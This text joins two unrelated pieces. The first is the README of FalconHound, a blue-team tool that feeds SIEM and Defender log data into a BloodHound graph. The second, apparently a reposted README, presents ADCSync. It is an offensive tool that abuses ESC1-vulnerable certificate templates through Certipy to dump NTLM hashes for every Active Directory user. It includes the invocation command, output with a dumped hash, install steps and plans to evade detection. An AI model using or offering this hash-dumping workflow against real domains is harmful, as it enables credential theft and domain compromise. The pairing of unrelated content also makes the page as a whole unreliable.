
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.

Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog detailing more on why we developed it and some use case examples can be found here


Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.

The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.


  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.


FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

./falconhound -go -keyvault


Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.

Action folder structure

The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

While most items will be fairly self explanatory,there are some important things to note about actions:


As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true


This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

Debug: false


The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN { , Count:COUNT(, Role:type(r), Owners:COLLECT(}


Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.


  - Name: CSV
Enabled: true
Path: path/to/filename.csv


The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

  - Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.


The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is why also query output needs to be controlled, you might otherwise flood your target.

  - Name: Sentinel
Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

 - Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.


Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
Enabled: true

Azure Data Explorer

Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
Enabled: true
Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession. The relationship will have the following properties:

"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.


FalconHound will add the following properties to nodes in the graph:

Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.


The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.

The required permissions for your AppID/AppSecret are listed here.


A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.


Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.


FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.

Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.


This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.

ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

By: Zion3R
19 January 2024 at 11:30

This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.

This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip -dc-ip -f users.json -o ntlm_dump.txt

___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LO CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::


ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.


git clone
cd adcsync
pip3 install -r requirements.txt


To use this tool we need the following things:

  1. Valid Domain Credentials
  2. A user list from a bloodhound dump that will be passed in.
  3. A template vulnerable to ESC1 (Found with Certipy find)
# python3 --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/

Usage: [OPTIONS]

-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of th e target machine [required]
--help Show this message and exit.


  • Support alternative authentication methods such as NTLM hashes and ccache files
  • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
  • Add jitter and sleep options to avoid detection
  • Add type validation for all variables


  • puzzlepeaches: Telling me to hurry up and write this
  • ly4k: For Certipy
  • WazeHell: For the script to set up the vulnerable AD environment used for testing
